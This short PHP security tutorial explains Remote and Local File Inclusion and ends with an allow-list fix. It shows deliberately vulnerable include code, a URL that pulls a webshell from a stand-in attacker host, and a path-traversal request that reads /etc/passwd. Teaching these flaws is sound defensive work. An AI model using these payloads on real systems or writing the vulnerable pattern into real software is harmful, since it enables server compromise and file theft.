Example
Remote File Inclusion
Remote File Inclusion (also known as RFI) is a type of vulnerability that allows an attacker to include a remote file.
This example injects a remotely hosted file containing a malicious code:
<?php
include $_GET['page'];
/vulnerable.php?page=http://evil.example.com/webshell.txt?
Local File Inclusion
Local File Inclusion (also known as LFI) is the process of including files on a server through the web browser.
<?php
$page = 'pages/'.$_GET['page'];
if(isset($page)) {
include $page;
} else {
include 'index.php';
}
/vulnerable.php?page=../../../../etc/passwd
Solution to RFI & LFI:
It is recommended to only allow including files you approved, and limit to those only.
<?php
$page = 'pages/'.$_GET['page'].'.php';
$allowed = ['pages/home.php','pages/error.php'];
if(in_array($page,$allowed)) {
include($page);
} else {
include('index.php');
}
